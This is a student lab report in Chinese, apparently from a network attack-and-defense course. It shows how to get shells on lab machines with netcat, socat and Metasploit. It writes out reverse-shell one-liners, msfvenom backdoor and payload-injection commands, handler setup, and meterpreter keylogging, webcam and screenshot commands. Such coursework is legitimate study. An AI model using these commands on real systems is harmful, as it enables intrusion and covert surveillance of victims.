1. 程式人生 > 其它 >20192430 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告

20192430 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告

一、實驗內容

(1)使用netcat獲取主機操作Shell,cron啟動某項任務
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

二、實驗過程

任務一

使用netcat獲取主機操作Shell,cron啟動某項任務

首先獲取主機ip地址以及虛擬機器ip地址

測試主機與虛擬機器之間的連通性(ping)

ncat.exe -l -p 8888 // win主機執行監聽指令
nc 192.168.1.172 8888 -e /bin/sh // linux反彈連線win主機指令
nc -l -p 8888 // linux主機執行監聽指令
ncat.exe -e cmd.exe 192.168.241.128 8888 // win主機反彈連線linux指令

工具測試完畢開始實驗目標:使用cron獲得反彈,新增反彈命令

使用ncat.exe監聽反彈資訊

任務二

使用socat獲取主機操作Shell, 任務計劃啟動

在任務計劃程式中建立任務,具體設定如圖

達到時間後會彈出視窗

不關閉視窗,在虛擬機器裡使用socat命令獲取主機shell

socat - tcp:192.168.1.172:1899

任務三

使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell

建立後門程式

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.172 LPORT=1899 -f exe > 20192430xzc_backdoor.exe

建立結果如下

將後門程式通過ncat輸入輸出重定向傳輸到主機上

nc 192.168.1.172 1899 < 2019230xzc_backdoor.exe
ncat -l -p 1899 -vv -w 3 > 20192430xzc_backdoor.exe

在虛擬機器中使用msfconsole指令開啟msf控制檯

進入監聽模組,設定攻擊載荷,地址號和埠號

use exploit/multi/handler // 進入監聽模組
set payload windows/meterpreter/reverse_tcp // 設定攻擊載荷
set LHOST 192.168.241.128 // 設定IP地址,與後門的LHOST保持一致
set LPORT 1899 // 設定埠號,與後門的LPORT保持一致

使用exploit開啟監聽,出現

# [*] Started reverse TCP handler on 192.168.241.128:1899

此時在主機執行後門程式,則可以獲得主機shell

任務四

(4)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
record_mic//獲取音訊

這裡由於虛擬機器問題並未成功實現,詳見問題與解決

webcam_snap//獲取攝像頭許可權拍照
keyscan_start//記錄敲擊鍵盤的過程
keyscan_dump//讀取敲擊鍵盤的記錄
screenshot//獲取主機截圖

獲取提權結果

任務五

(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。

生成shellcode並注入

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.241.128 LPORT=1899 -x ./pwn20192430 -f elf > pwn20192430_00

進入msf控制檯,由於是針對linux的32位程式,故攻擊載荷變為

use exploit/multi/handler // 進入監聽模組
set payload linux/x86/meterpreter/reverse_tcp // 設定攻擊載荷
set LHOST 192.168.241.128 // 設定IP地址,與後門的LHOST保持一致
set LPORT 1899 // 設定埠號,與後門的LPORT保持一致

在另一個終端中執行程式,即可獲得Linux的shell許可權

三、問題及解決方案

  • 問題1:傳輸後門程式時顯示目標計算機積極拒絕
  • 問題1解決方案:多次重複之後成功,並未找到實際原因
  • 問題2:嘗試提權時無法獲取音訊

  • 問題2解決方案:在網上搜索之後並未解決,虛擬機器顯示無法開啟聲音裝置

  • 問題3:任務五監聽時sesion不斷迴圈增加,並未找到原因

四、回答問題

(1)例舉你能想到的一個後門進入到你係統中的可能方式?

部分網路資源安裝包捆綁下載

(2)例舉你知道的後門如何啟動起來(win及linux)的方式?

網路協議的捆綁自啟動或者軟體中設定後門自啟動

(3)Meterpreter有哪些給你映像深刻的功能?

非常便捷的生成後門程式,獲取主機的一系列許可權

(4)如何發現自己有系統有沒有被安裝後門?

檢查是否有不常用的ip連線或者埠持續開放

五、學習感悟、思考等

本次實驗學習了反彈連結與後門程式獲取許可權,在實驗中遇到很多問題,但是在同學和老師的幫助下解決了大部分,對於後門程式也有了實踐方面的瞭解,希望今後還能繼續完善這方面的知識,理論與實踐相互促進.
雖然現在的我僅僅只是瞭解後門的基本原理,掌握了最基本的後門的生成、投送、啟動,但有了現在的基礎,一步步循序漸進,我會學到更深入的知識,也認識到系統防範入侵的能力很低,在以後工作學習中應注意安全防護。
最後感謝老師和同學對於實驗問題的解答與幫助。